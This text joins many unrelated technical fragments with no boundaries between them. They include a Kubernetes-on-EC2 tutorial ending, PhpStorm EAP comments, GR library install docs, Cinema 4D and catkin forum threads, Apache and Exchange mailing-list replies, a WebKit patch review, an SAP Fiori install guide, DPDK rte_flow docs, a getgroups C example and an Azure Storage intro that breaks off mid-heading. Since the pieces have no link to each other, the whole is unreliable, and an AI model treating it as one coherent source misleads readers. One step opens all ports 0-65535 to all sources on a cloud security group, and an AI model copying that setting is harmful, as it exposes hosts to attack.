The project I was using was on Spring 3.0.0 - haven't tested it with anything else.
Tried with 4.1.6 and it still doesn't work. Although, thanks for the article!
But you are having to create an instance of StaticHub - then what is the point of making the variable static if we had to create an object for it? It's like a hack and is of no real use but academic demonstration. :-(
The benefit: we don't have a public constructor or setter. The "hack" allows us to keep the static API clean.
|
http://planproof-fool.blogspot.com/2010/03/spring-setting-static-fields.html
|
CC-MAIN-2017-30
|
refinedweb
| 439
| 64.71
|
NAME
Alt - Alternate Module Implementations
SYNOPSIS
PERL_ALT_INSTALL=OVERWRITE cpanm Alt::IO::All::Redux
ALT BEST PRACTICES
This idea is new, and the details should be sorted out through proper discussions. Pull requests welcome.
Here are the basic guidelines for best using the Alt namespace:
- Name Creation
Names for alternate modules should be minted like this:
"Alt-$Original_Dist_Name-$phrase"
For instance, if MSTROUT wants to make an alternate IO-All distribution to have it be Moo-based, he might call it:
Alt-IO-All-Moo.
- Makefile.PL Changes
Due to experience with problems, it is important to make your Alt module not install without explicit direction. You can accomplish this easily in a Makefile.PL, with something like this:
my $alt = $ENV{PERL_ALT_INSTALL} || '';
$WriteMakefileArgs{DESTDIR} = $alt ? $alt eq 'OVERWRITE' ? '' : $alt : 'no-install-alt';
Similar techniques should be available for other module release frameworks.
- Module for CPAN Indexing
You will need to provide a module like Alt::IO::All::MSTROUT so that CPAN will index something that can cause your distribution to get installed by people:
PERL_ALT_INSTALL=OVERWRITE cpanm Alt::IO::All::MSTROUT
Since you are adding this module, you should add some doc to it explaining your alternate version's improvements.
The Alt:: module can be as simple as this:
package Alt::IO::All::MSTROUT; our $VERSION = '0.01';
- no_index
It is important to use the
no_indexdirective on the modules you are providing an alternates for. This is especially important if you are the author of the original, as PAUSE will reindex CPAN to your Alt- version which defeats the purpose. Even if you are not the same author, it will make your index reports not show failures.
- Versioning
It is important to not declare a $VERSION in any of the modules that you are providing alternates for. This will help ensure that your alternate module does not satisfy the version requirements for something that wants the real module.

If you want to depend on the alternate versions, then set the dependency on the Alt:: module.

NOTE: If you provide an alternate Foo::Bar (with no VERSION) it will satisfy the version requirements for someone who requires Foo::Bar => 0. In a sense, depending on version 0 means that alternates are OK.
- use the Alt module
You should add this line to your alternate modules:
use Alt::IO::All::MSTROUT;
That way the Alt:: module gets loaded any time you use IO::All (with the alternate version installed). This gives debugging clues since the Alt:: module is now in %INC.
- Other Concerns
If you have em, I(ngy) would like to know them. Discuss on #toolchain on irc.perl.org for now..
AUTHOR
Ingy döt Net <ingy@cpan.org>
See
|
https://metacpan.org/pod/Alt
|
CC-MAIN-2016-44
|
refinedweb
| 447
| 63.49
|
Getting the news using The Guardian's API on Windows Phone
The Guardian newspaper provides an open platform API so that the published articles (after 1999) can be accessed and used in any application. This article explains how to get latest news and articles using the API.
Windows Phone 8
Windows Phone 7.5
Introduction
The Guardian API has four building blocks which form the basis of how to fetch published articles.
- Content Search - The basic search based on keywords. Results/News are provided in the form of articles lists.
- Section Search - All the articles published in The Guardian lie under some section. We can choose section(s) under which we would like to do basic content search.
- Tag Search - Articles which are tagged by some keyword can be search by this kind of search operation.
- Item Search - Item search gives the detail information available for a single content.
In this article, we will make use of first three to get news based on various parameters. We will make a panorama page having three portions for the basic search/content search, sections search and tags search. On the basis of these filters, we will open our listing page which will show searched articles. Then we can view the detail of any selected item using Web Browser control.
The screens in this project are as shown below:
Prerequisites
- For this particular article, it is not mandatory to register for an application key for The Guardian API. A key is required in order to get detailed information related to the searched items - it is available from here.
- To use this article, we need to have a reference to The Windows Phone Toolkit which can be installed by NuGet Manager. To do so, in the Solution Explorer | Manage Nuget Packages >> search for wptoolkit and install it.
Note: The Guardian API provides all data free of cost. The detailed amount of data we can fetch depends on whether we are using application key or not. The API does has a limit on API calls per month but if you are willing to have an app based on it, then the limits can be increased for individual publishers.
References Required
Following references to the DLLs are required.
- Microsoft.Phone.Controls.Toolkit
- PhonePerformance
- System.Runtime.Serialization
- System.Servicemodel
- System.Servicemodel.web
UI
- HomePage - A panorama control having three panorama items will be used. In the first one, a text box and a couple of date pickers are placed. Any item can be searched by writing some text only. To reduce the search results, the time intervals can be mentioned. In the second one, a simple list of all the sections available will be placed. On selecting among the items, an icon of a tick mark will be visible. In the third and last panorama item, a text box will be placed to search related tags. The successful results will be shown in the list box beneath it.
- CommonList - To make all the lists (tags/sections etc.), we have used the User Control defined in this file.
- ArticlesListingPage - In this page, we will show the total number of results received and the initial 10 results in a list by default. At the bottom of the list there is a more option; pressing it fetches the next 10 items and adds them to the current list. This process can be repeated until all the received results have been viewed.
- ArticleDetailPage- In this page, we will simply show the detail of any article using a web browser control.
Parsing the JSON response
This section demonstrates how to parse the JSON response received by the content search. Tags and Sections search are parsed similarly (see the attached source code for detail).
Data Structures
When we make a hit for content search, the structure of the response we get starts from the root node named response (declared in ContentMainResponse.cs):
[DataContract]
public class ContentMainResponse
{
[DataMember(Name = "response")]
public ContentResponse Response { get; set; }
}
The ContentResponse used in response (declared in ContentResponse.cs) has setters and getters for the main elements returned by the query (status, number of pages, current page, etc.):
[DataContract]
public class ContentResponse
{
[DataMember(Name = "status")]
public string Status { get; set; }
[DataMember(Name = "userTier")]
public string UserTier { get; set; }
[DataMember(Name = "total")]
public string Total { get; set; }
[DataMember(Name = "startIndex")]
public string StartIndex { get; set; }
[DataMember(Name = "pageSize")]
public string PageSize { get; set; }
[DataMember(Name = "currentPage")]
public string CurrentPage { get; set; }
[DataMember(Name = "pages")]
public string Pages { get; set; }
[DataMember(Name = "orderBy")]
public string OrderBy { get; set; }
[DataMember(Name = "results")]
public List<ContentObject> ContentObjList { get; set; }
}
Note that the results data member is a list of ContentObject which define each individual article (defined in ContentObject.cs):
[DataContract]
public class ContentObject
{
[DataMember(Name = "id")]
public string Id { get; set; }
[DataMember(Name = "sectionId")]
public string SectionId { get; set; }
[DataMember(Name = "sectionName")]
public string SectionName { get; set; }
[DataMember(Name = "webPublicationDate")]
public string WebPublicationDate { get; set; }
[DataMember(Name = "webTitle")]
public string WebTitle { get; set; }
[DataMember(Name = "webUrl")]
public string WebUrl { get; set; }
[DataMember(Name = "apiUrl")]
public string ApiUrl { get; set; }
[DataMember(Name = "fields")]
public ContentThumbnail Fields { get; set; }
}
Last of all, each article (ContentObject) has a thumbnail (ContentThumbnail), which is declared in ContentThumbnail.cs:
[DataContract]
public class ContentThumbnail
{
[DataMember(Name = "thumbnail")]
public string ThumbnailUrl { get; set; }
}
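The article does not show the deserialization step itself; one possible version using DataContractJsonSerializer (method name assumed; needs System.IO, System.Text and System.Runtime.Serialization.Json) is:
public void parseContentResponseData(String strResponse)
{
    using (MemoryStream ms = new MemoryStream(Encoding.UTF8.GetBytes(strResponse)))
    {
        DataContractJsonSerializer serializer =
            new DataContractJsonSerializer(typeof(ContentMainResponse));
        ContentMainResponse root = (ContentMainResponse)serializer.ReadObject(ms);
        List<ContentObject> articles = root.Response.ContentObjList;
        // bind 'articles' to the listing page here
    }
}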
Files Used
All the files used for the different types of web services hits in this app are listed below:
- ContentObject.cs
- ContentResponse.cs
- ContentThumbnail.cs
- SectionMainResponse.cs
- SectionObject.cs
- SectionResponse.cs
- TagObject.cs
- TagsMainResponse.cs
- TagsResponse.cs
API Usage
Sections Search
As soon as the Home page loads, we are fetching the list of all available sections. The code snippet is as below.
public void getSectionsList()
{
    HttpWebRequest httpReq = (HttpWebRequest)HttpWebRequest.Create(new Uri(AppConstants.sectionsBaseUri));
    httpReq.BeginGetResponse(HTTPWebRequestSectionsCallBack, httpReq);
}
private void HTTPWebRequestSectionsCallBack(IAsyncResult result)
{
    try
    {
        HttpWebRequest httpRequest = (HttpWebRequest)result.AsyncState;
        string strResponse = new StreamReader(httpRequest.EndGetResponse(result).GetResponseStream()).ReadToEnd();
        // Parse the raw JSON on the UI thread.
        this.Dispatcher.BeginInvoke(() =>
        {
            parseSectionsResponseData(strResponse);
        });
    }
    catch
    { }
}
After receiving the sections data, we parse it and set it on the target list box. When a section is tapped, we need to store its id, because multiple section names can be combined when searching content on The Guardian: to search some text within section 1 or section 2, we join them and send them in the web request as section 1 | section 2. The code of the sections list box selection handler is shown below:
private void sectionsList_SelectionChanged(object sender, SelectionChangedEventArgs e)
{
    if (sectionsList != null && sectionsList.SelectedIndex >= 0)
    {
        CommonList data = (sender as ListBox).SelectedItem as CommonList;
        int listSelIndex = sectionsList.SelectedIndex;
        Boolean flagIsAlreadySelected = false;
        // if index is already selected, then deselect it
        for (int i = 0; i < _prevSelSectionIndexArr.Count; i++)
        {
            if (listSelIndex == _prevSelSectionIndexArr.ElementAt(i))
            {
                _prevSelSectionIndexArr.RemoveAt(i);
                _sectionIdsArrToBeSearchIn.RemoveAt(i);
                data.imgSectionTickIcon.Visibility = System.Windows.Visibility.Collapsed;
                flagIsAlreadySelected = true;
                break;
            }
        }
        // if not selected earlier then select it
        if (!flagIsAlreadySelected)
        {
            data.imgSectionTickIcon.Visibility = System.Windows.Visibility.Visible;
            _prevSelSectionIndexArr.Add(listSelIndex);
            _sectionIdsArrToBeSearchIn.Add(data.txtSectionId.Text.Trim());
        }
        sectionsList.SelectedIndex = -1; // reset the index to -1
    }
}
Above, we simply check whether the tapped item is already selected. If it is, it gets deselected; otherwise it is selected and its id is saved in a String-type list.
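When the content search request is finally built, the collected ids have to be combined into a single parameter separated by | characters. A minimal sketch, assuming _sectionIdsArrToBeSearchIn is the list filled above (the helper name is hypothetical):
// Joins the selected section ids as "section1|section2|..." so they
// can be passed to the API in a single query parameter.
private string buildSectionParameter()
{
    return String.Join("|", _sectionIdsArrToBeSearchIn.ToArray());
}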
Tags Search
To find the desired tags, we created a text box and a search button. Tapping the search button starts the tag search. The code snippet is shown below:
public void getTagsList(String aKeyword, int aPageNumber)
{
    HttpWebRequest httpReq = (HttpWebRequest)HttpWebRequest.Create(new Uri(AppConstants.tagsBaseUri + "q=" + aKeyword + "&page=" + aPageNumber));
    httpReq.BeginGetResponse(HTTPWebRequestTagsCallBack, httpReq);
}
private void HTTPWebRequestTagsCallBack(IAsyncResult result)
{
    try
    {
        HttpWebRequest httpRequest = (HttpWebRequest)result.AsyncState;
        string strResponse = new StreamReader(httpRequest.EndGetResponse(result).GetResponseStream()).ReadToEnd();
        // Parse the raw JSON on the UI thread.
        this.Dispatcher.BeginInvoke(() =>
        {
            parseTagsResponseData(strResponse);
        });
    }
    catch
    { }
}
By default, the first 10 results are shown; the option to view more items is also available in this list. The code snippet is shown below.
private void lst_tagsResult_SelectionChanged(object sender, SelectionChangedEventArgs e)
{
    CommonList data = (sender as ListBox).SelectedItem as CommonList;
    if (lst_tagsResult != null && lst_tagsResult.SelectedIndex >= 0)
    {
        try
        {
            if (data.txtTagWebTitle.Text.Contains("more"))
            {
                int tagsListSelIndex = lst_tagsResult.SelectedIndex;
                try
                {
                    _tagsResultList.RemoveAt(tagsListSelIndex);
                }
                catch
                { }
                getTagsList(_aTagWordToSearch, ++_aTagsPageNumber);
            }
            else
            {
                int listSelIndex = lst_tagsResult.SelectedIndex;
                Boolean flagIsAlreadySelected = false;
                // if index is already selected, then deselect it
                for (int i = 0; i < _prevSelTagsIndexArr.Count; i++)
                {
                    if (listSelIndex == _prevSelTagsIndexArr.ElementAt(i))
                    {
                        _prevSelTagsIndexArr.RemoveAt(i);
                        _tagsIdsArrToBeSearchIn.RemoveAt(i);
                        data.imgTagTickIcon.Visibility = System.Windows.Visibility.Collapsed;
                        flagIsAlreadySelected = true;
                        break;
                    }
                }
                // if not selected earlier then select it
                if (!flagIsAlreadySelected)
                {
                    data.imgTagTickIcon.Visibility = System.Windows.Visibility.Visible;
                    _prevSelTagsIndexArr.Add(listSelIndex);
                    _tagsIdsArrToBeSearchIn.Add(data.txtTagId.Text.Trim());
                }
                lst_tagsResult.SelectedIndex = -1; // reset the index to -1
            }
        }
        catch
        { }
    }
}
That covers the code of panorama items 2 and 3; we now move to panorama item 1. Here, we can select a time interval to narrow down our search results. The code snippet is shown below.
private void datePicker_To_ValueChanged(object sender, DateTimeValueChangedEventArgs e)
{
    if (e.NewDateTime != null)
    {
        DateTime dateTo = (DateTime)e.NewDateTime;
        DateTimeOffset dateOffset = new DateTimeOffset(dateTo,
            TimeZoneInfo.Local.GetUtcOffset(dateTo));
        // keep only the date part of the offset-aware ISO 8601 timestamp
        _searchToDate = trimDateFromDateTime(dateOffset.ToString("o"));
    }
}
private void datePicker_From_ValueChanged(object sender, DateTimeValueChangedEventArgs e)
{
    if (e.NewDateTime != null)
    {
        DateTime dateFrom = (DateTime)e.NewDateTime;
        DateTimeOffset dateOffset = new DateTimeOffset(dateFrom,
            TimeZoneInfo.Local.GetUtcOffset(dateFrom));
        // keep only the date part of the offset-aware ISO 8601 timestamp
        _searchFromDate = trimDateFromDateTime(dateOffset.ToString("o"));
    }
}
private String trimDateFromDateTime(String aFullDate)
{
    String resultantString = null;
    try
    {
        // the ISO 8601 string is "yyyy-MM-ddT..."; cut at the 'T'
        int posOfT = aFullDate.IndexOf('T');
        resultantString = aFullDate.Substring(0, posOfT);
    }
    catch (Exception)
    {
    }
    return resultantString;
}
Tapping the search button on the first panorama item redirects to the ArticlesListingPage, supplying the required values. The content search server request is made on that page.
Content Search
We request the content search by passing parameters such as the keyword to search for, the page number, section names, tag names, the time interval, etc.
public void getArticlesContents(String aKeyword, int aPageNumber)
{
    HttpWebRequest httpReq = (HttpWebRequest)HttpWebRequest.Create(new Uri(AppConstants.searchBaseUri + "q=" + aKeyword + "&page=" + aPageNumber +
        "&from-date=" + _searchFromDate + "&to-date=" + _searchToDate + "&format=" + "json" + "&show-fields=thumbnail" + "&section=" + _sectionNameToBeSearchIn +
        "&tag=" + _tagNameToBeSearchIn));
    httpReq.BeginGetResponse(HTTPWebRequestCallBack, httpReq);
}
In the callback, the response is saved and parsed.
In OnNavigatedTo(), we save the values received from the previous page and make the server request to search for articles based on our criteria. After receiving a successful response, the response is parsed.
In this search list, 10 items are visible by default; the more option is available here as well. Tapping more makes a new server request which fetches the next 10 items. Tapping any item other than the one with the more option opens the detail page, which shows the article's detail in a web browser.
Build and Run
Now you may build the app and try to run it.
Summary
This way we can get the latest news, in the form of articles, from The Guardian's site using its API.
Croozeus - Nice app
Hi Vaishali,
This looks like a useful application...
Maybe you could trim down the code snippets to whatever you want to highlight with this article. For example, if you want to illustrate how to use the Guardian API, focus on it. Maybe show a sample JSON response that you get from the API and, as you've already done, show functions to parse the response. It's not necessary to focus on the UI in this case; however, you can still show screenshots, and your attached code snippet can contain all the code.
The upshot is that for big projects like this, all code (XAML and cs) need not be highlighted in the article... just focus the part that you wish the article to cover. If there are multiple key aspects you want to cover, the right approach may be to have 2 or 3 small articles.
Regards,
Pankaj
PS: Are you going to publish this application to the marketplace? Are you going to maintain it for future updates? If yes, maybe you should also have it on projects.developer.nokia.com; you may find good collaborators.
croozeus 09:10, 13 May 2013 (EEST)
Vaishali Rawat - Thanks for Feedback
Hi Pankaj,
Thanks very much for your encouraging words.
I will try to reduce the code available in the article by omitting the least useful one.
Yes, I am looking forward to making an app out of it. About uploading it to Forum Nokia Projects... I am not quite sure.
Best Regards,
Vaishali
Vaishali Rawat 14:34, 15 May 2013 (EEST)
Hamishwillee - Agree with Pankaj
Hi Vaishali
The choice of article is good, and the code looks great. I would certainly consider making it a ND Project so you can extend it easily and get more people on board - that is of course up to you.
The main point that Pankaj is making is that as written this isn't very useful because it is impossible to tell what is important and relevant. A developer can look at the code because you've provided the zip. Having so much code here is just unreadable.
I strongly urge you to take his suggestion. Cover things like what APIs you use to access the service - were they native or third party? Were there any tricks to the JSON parsing. Can the API supply XML as well? Were there any tricks/tips you discovered while writing this - for example did data come in an unexpected format you had to convert. Perhaps something on caching the results (should you wish to) for faster loading. All the stuff that others can learn from if they want to use this API or a similar one.
So your article is about using the service and what it offers - that is something others can learn from, while your app is code that people can inspect for the detail.
I would imagine your article would shrink to about 1/4 the size.
Hope that makes sense.
Regards
Hamish
hamishwillee 04:38, 16 May 2013 (EEST)
Vaishali Rawat - I Agree
Hey Hamish,
Thank you for appreciating the article.
I agree that the code in this article is too much. While uploading it, i was having this feeling but didn't omit anything as I didn't wanted to miss any detail. Anyway, I will definitely reduce the code written here. Will also mention the minor details you suggested.
Just give me some time.
BR,
Vaishali
Vaishali Rawat 15:29, 16 May 2013 (EEST)
Hamishwillee - Of course!
Take your time. Sorry to dump so many reviews on you all at once. And of course thank you again; these are still OK articles, just not as great as you are capable of.
hamishwillee 08:42, 17 May 2013 (EEST)
Vaishali Rawat - Code reduced
Hey Hamish | Pankaj,
I have reduced the code written in the article. Tried to include important information only. You may have a look at it now.
BR,
Vaishali
Vaishali Rawat 21:26, 21 May 2013 (EEST)
Hamishwillee - Looks a lot more clear to me
Hi Vaishali
Thank you. There is a lot less code now, which is good. Now you've removed the code you perhaps need to say a bit more about what you have left.
So you have lots of text like "This file has the following declaration." Why is this code interesting? This isn't the whole file, which is good, but it's not obvious what it shows and why. I think part of the problem is that this is still "file centric".
Frankly, as a reader I'm interested in the "hows" and "whys" - the file the information is in matters, but it's not the heading. So without delving too deeply, I look at this and see that your code does interesting things like getting and sending responses; as part of that it creates classes that have setters and getters for the main objects you're working with. These classes then interact with the service. All that is what is interesting and will help people understand what they need to do.
So my headings would be something like (and remembering I haven't read this in enough detail to know how it works!):
Looking at your code, the HomePage.cs section is closest to what I want, though you'd again have a title which explains what you're doing, not where you're doing it.
Hope that makes sense. It is more understandable now, just not as good as it could be.
Regards
H
hamishwillee 04:58, 22 May 2013 (EEST)
Pooja 1650 - Just got in!
Hi Vaishali | Hamish,
Sorry to step in all of a sudden, but I just made a couple of changes, like dividing the code-behind section into two parts: Sample JSON Parsing and App Logic Handling. So anybody interested in JSON parsing can check the first section, and everyone else can skip it.
Please let me know if it's fine.
Thanks,
Pooja
pooja_1650 15:24, 22 May 2013 (EEST)
Vaishali Rawat - Further Edited
Dear Hamish,
The article is further edited. I removed the references to individual pages and instead referred directly to the search types, like tags search, content search, etc.
Hope it's better now.
Regards,
Vaishali
Vaishali Rawat 20:49, 22 May 2013 (EEST)
Vaishali Rawat - @Pooja
Hey Pooja,
Thanks for the changes. I think they are fine.
Regards,
Vaishali
Vaishali Rawat 20:51, 22 May 2013 (EEST)
Vaishali Rawat - @Hamish
Hey Hamish,
I forgot to mention in my last comment that I have kept an example showcasing JSON parsing. If you think it's not useful, I can omit it. I thought that, if not for all search types, I could at least show how to parse the data for one kind of search response.
Regards,
Vaishali
Vaishali Rawat 21:05, 22 May 2013 (EEST)
Hamishwillee - Much better
Hi Vaishali/Pooja
Thanks for this. I think this is much better.
The section on parsing the response was still "file centric", so I have re-written it. Please check it out above. As you can see, by removing the filenames as headings I'm now in a position where I describe what the code is doing and what it is for, not what is in each file. As a rule it is rarely a good idea to have filenames as headings.
Now that I've done that, it's a bit obvious that this section is "dangling", i.e. it starts from "The root node of a response is a single tag named response", but it is not clear where this tag is used, how it gets populated, and how it then gets into the UI. I see further down you have "strResponse" - is this an object of type response?
It might be that we want to shift this around so that we JUST cover end-to-end "content search". So you'd have the UI, then the section on making the request using content search, then this section I've just made on getting the data into the data object (and briefly explain how that gets back into the UI). The sections on tag search etc. might be kept for the end as an "aside".
Does what I've done and I'm proposing make sense? The whole idea is that someone can understand end to end what needs to be done to create this type of service as well as this service.
Thoughts?
Regards
H
hamishwillee 05:29, 23 May 2013 (EEST)
Vaishali Rawat - Thanks for editings
Hi Hamish,
Your changes in JSON Response looks pretty good. Now it's more understandable.
> The root node of a response is a single tag named response, but it is not clear where this tag is used, how it gets populated and how this then gets into the UI.
The tag with the name response is part of the response we get by making the content search API hit. I have tried to explain it in that section now.
> I see further down you have "strResponse" - is this an object of type response?
It's a String type object, already declared above. Guess you missed it!
> How does the response then get into the UI?
I had previously shown the code by which I was mapping my response to the UI, but removed it later on as less code was required. I thought readers could check it in the attached zip.
> Does what I've done and I'm proposing make sense? The whole idea is that someone can understand end to end what needs to be done to create this type of service as well as this service.
I liked the idea a lot and it makes sense too. Now, by checking only the metadata section, one can directly jump to either of the search types. Writing the whole code into the article was a mistake; I will definitely take care of that in future.
I like the current structure, content and the length of the article.
Thanks very much for all the hard work.
Regards,
Vaishali
Vaishali Rawat 21:00, 23 May 2013 (EEST)
Hamishwillee - OK, your call.
Yes, overall its a much better document than originally. Thanks!
Regards
Hamish
hamishwillee 04:38, 24 May 2013 (EEST)
Vaishali Rawat - Missed something
Hi Hamish,
I am sorry, but I completely misunderstood your thoughts last time. So, you want the article to cover content search completely (start to end), with tags search and sections search explained only briefly?
Sounds good; we can definitely do this. Let me know if you want to see the article that way and I will edit it.
Regards,
Vaishali
Vaishali Rawat 15:24, 24 May 2013 (EEST)
Hamishwillee - What I want you to do
Hi Vaishali
What I "want you to do" has to be balanced with whether YOU think the suggestion is a good one and worth the additional effort.
I think it would be good to have an article which explains end to end how to do the content search, with just the highlights of the other two; that would be a good way of presenting this. So you'd start with: this is how I make the request, this is the object I get back, this is how I get it into the UI, and these are the minor differences for tag and section search.
At the moment all the information is there, but there isn't much logical flow - for example the UI is before the code to represent the returned request, which is before the code which makes the request.
Anyway, you decide if you think this might be better!
Regards
Hamish
hamishwillee 10:20, 27 May 2013 (EEST)
Developing A Spring Boot Application for Kubernetes Cluster: A Tutorial [Part 1]
The first part of this tutorial will show you how to install and configure Docker and the master and worker nodes your Spring app will need.
This article is part 1 of a series of four subsequent articles. Check out part 2, part 3, and part 4 here.
Introduction
One of my recent projects involved deploying a Spring Boot application into a Kubernetes cluster in the Amazon Elastic Compute Cloud (Amazon EC2) infrastructure. Although individual components of the overall technology stack have been well-documented, I thought it would still be useful to describe the particular installation and configuration steps. Hence, this article will discuss the following:
Creating a Kubernetes cluster in the Amazon EC2 environment.
Developing a sample Spring Boot application and storing it in a private Docker repository.
Deploying the application into the cluster by fetching it from the private Docker repository.
The Amazon EC2 environment discussed in this article involves only free tier servers. Thus, interested readers can sign up for AWS Free Tier and develop their own project following this tutorial without expensive hardware/software.
This article is organized as follows. The next section gives a quick overview of the Kubernetes framework. The following section discusses the high-level architecture of the project. The subsequent sections describe detailed steps to complete our project, in particular:
Configuring and launching virtual servers for individual nodes in the cluster.
Installing Docker, Kubelet, Kubeadm, Kubectl in each node.
Configuring master node and worker nodes.
Installing Flannel as a network pod for the cluster.
Developing a sample Spring Boot application for deployment into the cluster.
Building and deploying the sample Spring application into a private Docker repository at hub.docker.com.
Creating a secret key in the master node to access the Docker repository.
Fetching individual components of the application from the Docker repository and deploying them into the corresponding nodes in the cluster.
Creating the cluster services to access the application.
The last section will give concluding remarks.
Background
Kubernetes is an open-source platform to support deployment, management, and scaling of container-based applications. Kubernetes is compatible with various container runtimes, such as Docker. A pod in Kubernetes represents one or more containerized applications that run together for a specific business purpose. A node is a machine where one or more pods are deployed. For example, in Amazon EC2 environment a virtual server instance created from an Ubuntu server image can be viewed as a node. A service brings together one or more pods to represent a multi-tier application with an IP address, DNS name, and load-balanced access to pods encapsulated by the service.
A Kubernetes cluster consists of multiple nodes hosting one or more services. Components in a Kubernetes cluster can be divided into two groups: those that manage each individual node and those that manage the cluster itself. The components in the latter group are also known to be part of the control plane and they execute in a master node of the cluster. The components in the control plane manage configuration data of the cluster, provide access to the configuration data via an API server, furnish scheduling of pods across nodes depending on workload demands, and arrange various controller services for different types of resources. There is at least one master node in a cluster. Components that manage each individual node deal with state management for the pods, node resource usage and performance monitoring, load-balancing and network proxy tasks, and container management.
Some additional definitions are listed below.
kubeadm: A software tool that can be used to create and manage a Kubernetes cluster.
kubelet: A software agent that runs in each cluster node, mainly responsible for managing containers inside pods.
kubectl: A command-line tool to create and manage various entities in a cluster including pods and services.
Flannel: A cluster plug-in used to deliver IPv4 addressing, routing and network control between the nodes in a cluster.
For a high-level overview of Kubernetes concepts, a good starting point is the Kubernetes Wikipedia page. For a deeper dive, start here.
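To make the pod concept concrete, the manifest below is a minimal, illustrative example (the name and image are arbitrary and not part of this tutorial's deployment). Saved as pod-example.yaml, it would be created with kubectl apply -f pod-example.yaml and inspected with kubectl get pods:
# pod-example.yaml - a single-container pod
apiVersion: v1
kind: Pod
metadata:
  name: example-pod
  labels:
    app: example
spec:
  containers:
  - name: web
    image: nginx:1.15
    ports:
    - containerPort: 80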
Architecture
The below diagram outlines the architecture discussed in this article. The Kubernetes cluster in the Amazon EC2 environment consists of one master and 4 worker nodes. The sample Spring Boot application is composed of a web layer and a service layer. Each of those is a separate Spring Boot application built, deployed and configured separately. For high availability, each of the web and service layers is deployed into two distinct worker nodes, Web-1, Web-2 for the web layer and Service-1, Service-2 for the service layer. The single master node is responsible for cluster configuration and administration. The Spring Boot application is stored and fetched from the private repository in Docker Hub.
The following software versions will be used.
Ubuntu: 16.04.4 LTS
Kubectl: 1.11.1
Kubeadm: 1.11.1
Kubernetes: 1.11.1
Flannel: v0.10.0-amd64
Docker: 17.03.2-ce
Spring Boot: 2.0.1
Spring Cloud: Finchley Release
Java: openjdk-8
Preparing The Amazon EC2 Environment
As mentioned previously, the project discussed here involves only Amazon EC2 free tier servers. Referring to the architecture diagram above, we need to create a total of 6 instances, one master node, 4 worker nodes, and one outside node to test access to cluster from outside. Each node will utilize the Ubuntu Server 16.04 LTS (HVM) Amazon Machine Image. That is a server with a single virtual CPU and 1 GB memory, below the recommended benchmark to install Kubernetes in a production environment, but still sufficient for the project in this article.
Let us start with the master node. In the Amazon EC2 console, launch an instance selecting Ubuntu Server 16.04 LTS (HVM) Amazon Machine Image. Accept defaults and create a new key pair when prompted (or use an existing key pair if you already have one).
After the instance starts, click on "Security groups launch-wizard-XX" as shown below.
In the Inbound tab, add custom TCP and UDP rules to allow inbound traffic in 0-65535 port range for all sources. Hence, inbound rules will look like below.
(In any real application the allowable port range will be much narrower.)
For outbound traffic, no change needs to be made. By default, all outbound traffic is allowed.
Installation and configuration steps for the master node are broken into two groups, "Worker Node Steps" and "Additional Steps for Master." As the name implies, "Worker Node Steps" will be executed for each worker node. For the master node, after executing "Worker Node Steps" follow "Additional Steps for Master."
Worker Node Steps
Connect to the instance, worker or master, depending on the particular scenario (use the key pair created and chosen while launching the instance). Become root with the command
sudo su -. The commands indicated below should be executed in sequence.
We start by installing Docker.
# Install Docker 17.03 (following the kubeadm installation guide for Ubuntu 16.04)
apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
add-apt-repository "deb https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update && apt-get install -y docker-ce=$(apt-cache madison docker-ce | grep 17.03 | head -1 | awk '{print $3}')
We continue with installing kubeadm, kubelet and kubectl.
# Add the Kubernetes apt repository and install the tools
apt-get update && apt-get install -y apt-transport-https curl
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key add -
cat <<EOF >/etc/apt/sources.list.d/kubernetes.list
deb http://apt.kubernetes.io/ kubernetes-xenial main
EOF
apt-get update
apt-get install -y kubelet kubeadm kubectl
sysctl net.bridge.bridge-nf-call-iptables=1
systemctl daemon-reload
systemctl restart kubelet
Additional Steps for Master
Connect to the instance for master node (use the key pair created and chosen while launching the instance). Become root via
sudo su -. Execute the following.
apt-get update && apt-get upgrade
kubeadm init --pod-network-cidr=10.244.0.0/16
This last command will take a while to execute. At the end, you should see something like this:
...
kubeadm join 172.31.22.14:6443 --token mkae5q.j5mudz8g9e1xgc5u --discovery-token-ca-cert-hash sha256:dbddef4f66cf01e25f6aa39b30172e84c43f2990a4ebcd8b94600a5837de1d75
Jot down the command that starts with
kubeadm join, which will be needed by the worker nodes to join the cluster later on.
Continue the configuration of the master node by executing the following three commands.
mkdir -p $HOME/.kube sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config sudo chown $(id -u):$(id -g) $HOME/.kube/config
At this point, if you execute
systemctl status kubelet --full --no-pager
you should see something like this:
   Active: active (running) since Fri 2018-07-27 14:30:39 UTC; 2h 25min ago
   ...
The only remaining step in installing and configuring the master node is the installation of a pod network. For our purposes, we will utilize Flannel. To install Flannel, execute
kubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml
Then, executing
kubectl get services --all-namespaces -o wide
should display
NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE SELECTOR default kubernetes ClusterIP 10.96.0.1 <none> 443/TCP 2m <none> kube-system kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP 2m k8s-app=kube-dns
The service named kube-dns with IP address 10.96.0.10 provides DNS service for the cluster. We will utilize that service later on.
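As a quick, optional sanity check that cluster DNS is answering (an illustrative command, not a required step; it assumes the busybox image can be pulled), the API server's service name can be resolved from a throwaway pod:
kubectl run -it --rm dns-test --image=busybox --restart=Never -- nslookup kubernetes.default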
At this point, the installation and configuration of the master node has been completed. We now have a cluster that consists of a single master node. The next steps involve adding worker nodes to cluster.
Install and Configure Worker Nodes
For each of the 4 worker nodes repeat the following.
Launch an instance selecting Ubuntu Server 16.04 LTS (HVM) Amazon Machine Image.
Configure the corresponding security group by adding custom TCP and UDP rules to allow inbound traffic in 0-65535 port range for all sources.
Execute the steps in 'Worker Node Steps'.
Execute the
kubeadm join command previously displayed in the master node in response to the
kubeadm init command. For example,
kubeadm join 172.31.17.161:6443 --token nznjj2.nr2hqpunalqqwnem --discovery-token-ca-cert-hash sha256:19d6a42e17c43efb47aa78609dc0acf9b01db6011c5d64efee8c8c71b52d06d4
Via the above steps, you have installed and configured the worker node. You have also joined the worker node to the cluster.
Check the Running of the Cluster
Once you complete the steps for all worker nodes to connect to the cluster, in master node become root via
sudo su - and execute
kubectl get nodes. You should see something like this:
